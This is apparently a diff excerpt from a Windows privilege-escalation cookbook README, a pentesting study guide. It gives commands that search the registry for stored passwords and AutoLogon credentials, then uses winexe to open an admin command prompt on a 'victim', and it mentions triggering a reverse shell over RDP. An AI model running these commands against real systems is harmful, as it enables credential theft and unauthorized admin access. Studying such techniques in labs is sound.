nickvourd/Windows-Local-Privilege-Escalation-Cookbook/README.md

 * Start a listener on Kali and then restart the Windows VM.
 Open up a new RDP session to trigger a reverse shell running with admin privileges.
 You should not have to authenticate to trigger it.

   * rdesktop \<ip>

+ # Passwords Registry

+ * The registry can be searched for keys and values that contain the word "password":
+   * reg query HKLM /f password /t REG_SZ /s

+* If you want to save some time, query this specific key to find admin AutoLogon credentials:
+   * reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

+* On Kali, use the winexe command to spawn a command prompt running with the admin privileges (update the password with the one you found):
+   * winexe -U 'admin%password' //ip_of_victim cmd.exe